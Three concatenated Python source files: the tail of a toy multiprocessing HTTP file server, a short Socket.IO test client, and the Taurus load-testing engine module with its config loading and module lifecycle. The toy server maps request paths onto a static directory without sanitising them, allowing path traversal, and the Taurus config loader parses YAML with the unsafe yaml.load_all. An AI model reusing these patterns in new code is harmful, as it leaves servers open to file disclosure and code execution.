self.tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.tcp_socket.bind(server_address)
self.tcp_socket.listen(128)
def serve_forever(self):
"""永久运行监听接收连接"""
while True:
client_socket, client_address = self.tcp_socket.accept()
print(client_address, 'made a request to the server')
processes = multiprocessing.Process(target=self.handlerequest, args=(client_socket,))
processes.start()
client_socket.close()
def handlerequest(self, client_socket):
"""客户端请求处理,发送响应数据"""
# 收取浏览器请求头,并在服务器端打印显示
request_data = client_socket.recv(2048).decode('utf-8')
request_header_lines = request_data.splitlines()
# print(request_header_lines[0]) # the first line is the request line
# Parse the request line to get the requested resource
pattern = r'[^/]+(/[^ ]*)'
request_html_name = re.match(pattern, request_header_lines[0]).group(1)
# Build the path of the file to serve from the parsed request
if request_html_name == '/':
request_html_name = STATIC_PATH + 'baidu.html'
else:
request_html_name = STATIC_PATH + request_html_name
# Build the response depending on whether the file exists
try:
html_file = open(request_html_name, 'rb')
except FileNotFoundError:
# File does not exist: return a 404 status
resp_headers = 'HTTP/1.1 404 not found\r\n'
resp_headers += "Server: PWB" + str(VERSION) + '\r\n'
resp_headers += '\r\n'
resp_body = '==== 404 file not found===='.encode('utf-8')
else:
# File exists: read its contents and return status 200
resp_headers = "HTTP/1.1 200 OK\r\n" # 200 means the request succeeded and the resource was found
resp_headers += "Server: PWB" + str(VERSION) + '\r\n' # tell the browser which server responded
resp_headers += '\r\n' # blank line separates headers from body
resp_body = html_file.read() # the body is the file contents
html_file.close()
finally:
resp_data = resp_headers.encode('utf-8') + resp_body # combine response headers and body
# Send the response data to the browser
client_socket.send(resp_data)
client_socket.close() # short-lived HTTP connection: close the TCP connection after each request
def run():
"""运行服务器"""
pwb = HTTPServer(SERVER_ADDR)
print('web server:PWB %s on port %d...\n' % (VERSION, PORT))
pwb.serve_forever()
if __name__ == '__main__':
run()
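# Usage sketch (added for illustration; assumes a ./static/baidu.html exists next to this script):
#   $ python3 net09_web_PWB4.py
#   $ curl -i http://127.0.0.1:8888/             # 200, served from ./static/baidu.html
#   $ curl -i http://127.0.0.1:8888/missing.html # HTTP/1.1 404 not found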
|
test-socket.py
|
from threading import Thread
from socketIO_client_nexus import SocketIO, LoggingNamespace
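# Quick manual test (comment added for clarity): connect to a Socket.IO server assumed to be
# running at 192.168.43.168:5001, join the '/rekathon' namespace, print every 'backend'
# event on a background thread, and keep emitting 'backend' messages from the main loop.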
def receive_events_thread():
socketIO.wait()
def shit(*args):
print args
socketIO = SocketIO('http://192.168.43.168', 5001)
camera_namespace = socketIO.define(LoggingNamespace, '/rekathon')
camera_namespace.on('backend', shit)
receive_events_thread = Thread(target=receive_events_thread)
receive_events_thread.daemon = True
receive_events_thread.start()
while True:
camera_namespace.emit('backend', 'a')
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import hashlib
import json
import logging
import math
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from abc import abstractmethod
from collections import namedtuple, defaultdict
from distutils.version import LooseVersion
from json import encoder
import yaml
from yaml.representer import SafeRepresenter
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException, InvalidTaurusConfiguration
from bzt import ToolError
from bzt.requests_model import RequestParser
from bzt.six import numeric_types, string_types, text_type, PY2, UserDict, parse, reraise
from bzt.utils import PIPE, shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient
from bzt.utils import load_class, to_json, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import str_representer, Environment, RequiredTool
TAURUS_ARTIFACTS_DIR = "TAURUS_ARTIFACTS_DIR"
SETTINGS = "settings"
class Engine(object):
"""
Core entity of the technology, used to coordinate the whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(ScenarioExecutor.EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[ScenarioExecutor.EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions:
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
for param in (ScenarioExecutor.THRPT, ScenarioExecutor.CONCURR):
ensure_is_dict(execution, param, prov_type)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work: calls prepare() on Provisioning and the other
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait for modules to finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not ideal, since this file does not exist
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
The returned path is already absolute and must not be passed through abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "http://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
class Configuration(BetterDict):
"""
Loads both JSON and YAML configs with .properties-like overrides,
and dumps the effective config into files.
The first config should not contain action prefixes.
"""
JSON = "JSON"
YAML = "YAML"
def __init__(self, *args, **kwargs):
super(Configuration, self).__init__(*args, **kwargs)
self.log = logging.getLogger('')
self.dump_filename = None
self.tab_replacement_spaces = 0
self.warn_on_tab_replacement = True
def load(self, config_files, callback=None):
"""
Load and merge JSON/YAML files into current dict
:type callback: callable
:type config_files: list[str]
"""
self.log.debug("Configs: %s", config_files)
for config_file in config_files:
try:
configs = []
with codecs.open(config_file, 'r', encoding='utf-8') as fds:
if self.tab_replacement_spaces:
contents = self._replace_tabs(fds.readlines(), config_file)
else:
contents = fds.read()
self._read_yaml_or_json(config_file, configs, contents)
for config in configs:
self.merge(config)
except KeyboardInterrupt:
raise
except InvalidTaurusConfiguration:
raise
except BaseException as exc:
raise TaurusConfigError("Error when reading config file '%s': %s" % (config_file, exc))
if callback is not None:
callback(config_file)
def _read_yaml_or_json(self, config_file, configs, contents):
try:
self.log.debug("Reading %s as YAML", config_file)
yaml_documents = list(yaml.load_all(contents))
for doc in yaml_documents:
if doc is None:
continue
if not isinstance(doc, dict):
raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
configs.append(doc)
except KeyboardInterrupt:
raise
except BaseException as yaml_load_exc:
self.log.debug("Cannot read config file as YAML '%s': %s", config_file, yaml_load_exc)
if contents.lstrip().startswith('{'):
self.log.debug("Reading %s as JSON", config_file)
config_value = json.loads(contents)
if not isinstance(config_value, dict):
raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
configs.append(config_value)
else:
raise
def set_dump_file(self, filename):
"""
Set default file and format to be used by `dump` method
:type filename: str
"""
self.dump_filename = filename
def write(self, fds, fmt):
"""
Write config into opened file
:type fds: file
:type fmt: str
:raise TaurusInternalException:
"""
if fmt == self.JSON:
json_s = to_json(self)
fds.write(json_s.encode('utf-8'))
elif fmt == self.YAML:
yml = yaml.dump(self, default_flow_style=False, explicit_start=True, canonical=False, allow_unicode=True,
encoding='utf-8', width=float("inf"))
fds.write(yml)
else:
raise TaurusInternalException("Unknown dump format: %s" % fmt)
fds.write("\n".encode('utf-8'))
def dump(self, filename=None, fmt=None):
"""
Dump current state of dict into file. If no filename or format
specified, defaults are used
:type filename: str or NoneType
:type fmt: str or NoneType
"""
if not filename:
filename = self.dump_filename
if filename:
if not fmt:
self.dump(filename + ".yml", self.YAML)
self.dump(filename + ".json", self.JSON)
return
acopy = copy.deepcopy(self)
BetterDict.traverse(acopy, self.masq_sensitive)
BetterDict.traverse(acopy, self.replace_infinities)
with open(filename, "wb") as fhd:
self.log.debug("Dumping %s config into %s", fmt, filename)
acopy.write(fhd, fmt)
@staticmethod
def masq_sensitive(value, key, container):
"""
Remove sensitive data from config
"""
if isinstance(key, string_types):
for suffix in ('password', 'secret', 'token',):
if key.lower().endswith(suffix):
if value and isinstance(value, (string_types, text_type)):
container[key] = '*' * 8
@staticmethod
def replace_infinities(value, key, container):
"""
Remove non-string JSON values used by default JSON encoder (Infinity, -Infinity, NaN)
"""
del value
if isinstance(container[key], float):
if math.isinf(container[key]) or math.isnan(container[key]):
container[key] = str(container[key])
def _replace_tabs(self, lines, fname):
has_tab_indents = re.compile(r"^( *)(\t+)( *\S*)")
res = ""
for num, line in enumerate(lines):
replaced = has_tab_indents.sub(r"\1" + (" " * self.tab_replacement_spaces) + r"\3", line)
if replaced != line:
line = replaced
if self.warn_on_tab_replacement:
self.log.warning("Replaced leading tabs in file %s, line %s", fname, num)
self.log.warning("Line content is: %s", replaced.strip())
self.log.warning("Please remember that YAML spec does not allow using tabs for indentation")
res += line
return res
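# A minimal usage sketch for the Configuration class above (illustrative only;
# the file names are hypothetical). It loads several configs, merges them in
# order, and dumps the effective result in both supported formats.
def _example_configuration_roundtrip(config_paths):
    cfg = Configuration()
    cfg.tab_replacement_spaces = 4  # replace leading tabs so YAML parses
    cfg.load(config_paths)  # later files override earlier ones via merge()
    cfg.set_dump_file("effective-config")
    cfg.dump()  # with no fmt given, writes both the .yml and .json variants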
yaml.add_representer(Configuration, SafeRepresenter.represent_dict)
yaml.add_representer(BetterDict, SafeRepresenter.represent_dict)
if PY2:
yaml.add_representer(text_type, SafeRepresenter.represent_unicode)
yaml.add_representer(str, str_representer)
if PY2:
# dirty hack from http://stackoverflow.com/questions/1447287/format-floats-with-standard-json-module
encoder.FLOAT_REPR = lambda o: format(o, '.3g')
else:
pass # TODO: how to implement it?
class EngineModule(object):
"""
Base class for any BZT engine module
:type engine: Engine
:type settings: BetterDict
"""
def __init__(self):
self.log = logging.getLogger('')
self.engine = None
self.settings = BetterDict()
self.parameters = BetterDict()
def prepare(self):
"""
Preparation stage, at which configuration is being read, configs
and tools being prepared. All long preparations and checks should be
made here, to make `startup` stage as fast as possible.
"""
pass
def startup(self):
"""
Startup should be as fast as possible. Launch background processes,
do some API calls for initiation of actual work. Consider making all
checks and preparations on `prepare` stage.
"""
pass
def check(self):
"""
Check if work should be finished
:rtype: bool
:return: True if should be finished
"""
return False
def shutdown(self):
"""
Stop all processes that were started in `startup` stage.
Should also be as fast as possible, deferring all long operations to
`post_process` stage.
"""
pass
def post_process(self):
"""
Do all possibly long analysis and processing on run results
"""
pass
def _should_run(self):
"""
Returns True if provisioning matches run-at
"""
prov = self.engine.config.get(Provisioning.PROV)
runat = self.parameters.get("run-at", None)
if runat is not None and prov != runat:
self.log.debug("Should not run because of non-matching prov: %s != %s", prov, runat)
return False
return True
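# A hedged sketch of a custom module wired to the lifecycle described in the
# docstrings above: prepare() does the heavy setup, startup() stays fast,
# check() signals completion, shutdown() stops quickly, and post_process()
# does the long analysis. The class and its parameters are hypothetical and
# not part of bzt itself.
class _ExampleCounterModule(EngineModule):
    def prepare(self):
        self.limit = self.parameters.get("limit", 3)  # config reads and heavy setup belong here
        self.ticks = 0

    def startup(self):
        pass  # keep startup fast; nothing long-running is launched here

    def check(self):
        self.ticks += 1
        return self.ticks >= self.limit  # True tells the engine this module is done

    def shutdown(self):
        pass  # stop quickly; defer long work to post_process

    def post_process(self):
        self.log.info("checked %s times before finishing", self.ticks)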
class Provisioning(EngineModule):
"""
Base class for any provisioning type. Provisioning is the way to
get the resources that will run the job. For example, local provisioning
means using the local machine to run executors, remote means using
remote machines with BZT API nodes on them.
:type executors: list[ScenarioExecutor]
"""
PROV = "provisioning"
def __init__(self):
super(Provisioning, self).__init__()
self.executors = []
self.disallow_empty_execution = True
def prepare(self):
"""
Preparation in provisioning begins with reading executions list
and instantiating ScenarioExecutor classes for them
"""
super(Provisioning, self).prepare()
exc = TaurusConfigError("No 'execution' is configured. Did you forget to pass config files?")
executions = self.engine.config.get(ScenarioExecutor.EXEC, [])
if not executions and self.disallow_empty_execution:
raise exc
for execution in executions:
instance = self.engine.instantiate_module(execution.get("executor"))
instance.provisioning = self
instance.execution = execution
assert isinstance(instance, ScenarioExecutor)
self.executors.append(instance)
class FileLister(object):
"""
A mixin to get required files info from executor
"""
@abstractmethod
def resource_files(self):
"""
Get list of resource files
:rtype: list
"""
pass
class ScenarioExecutor(EngineModule):
"""
:type provisioning: engine.Provisioning
:type execution: BetterDict
"""
RAMP_UP = "ramp-up"
HOLD_FOR = "hold-for"
CONCURR = "concurrency"
THRPT = "throughput"
EXEC = "execution"
STEPS = "steps"
LOAD_FMT = namedtuple("LoadSpec", "concurrency throughput ramp_up hold iterations duration steps")
def __init__(self):
super(ScenarioExecutor, self).__init__()
self.env = Environment(log=self.log)
self.provisioning = None
self.execution = BetterDict() # FIXME: why have this field if we have `parameters` from base class?
self.__scenario = None
self.label = None
self.widget = None
self.reader = None
self.stdout = None
self.stderr = None
self.delay = None
self.start_time = None
self.preprocess_args = lambda x: None
def _get_tool(self, tool, **kwargs):
instance = tool(env=self.env, log=self.log, http_client=self.engine.get_http_client(), **kwargs)
assert isinstance(instance, RequiredTool)
return instance
def has_results(self):
if self.reader and self.reader.buffer:
return True
else:
return False
def get_script_path(self, required=False, scenario=None):
"""
:type required: bool
:type scenario: Scenario
"""
if scenario is None:
scenario = self.get_scenario()
if required:
exc = TaurusConfigError("You must provide script for %s" % self)
script = scenario.get(Scenario.SCRIPT, exc)
else:
script = scenario.get(Scenario.SCRIPT)
if script:
script = self.engine.find_file(script)
scenario[Scenario.SCRIPT] = script
return script
def get_scenario(self, name=None, cache_scenario=True):
"""
Returns scenario dict, extract if scenario is inlined
:return: DictOfDicts
"""
if name is None and self.__scenario is not None:
return self.__scenario
scenarios = self.engine.config.get("scenarios", force_set=True)
if name is None: # get current scenario
exc = TaurusConfigError("Scenario is not found in execution: %s" % self.execution)
label = self.execution.get('scenario', exc)
is_script = isinstance(label, string_types) and label not in scenarios and \
os.path.exists(self.engine.find_file(label))
if isinstance(label, list):
msg = "Invalid content of scenario, list type instead of dict or string: %s"
raise TaurusConfigError(msg % label)
if isinstance(label, dict) or is_script:
self.log.debug("Extract %s into scenarios" % label)
if isinstance(label, string_types):
scenario = BetterDict.from_dict({Scenario.SCRIPT: label})
else:
scenario = label
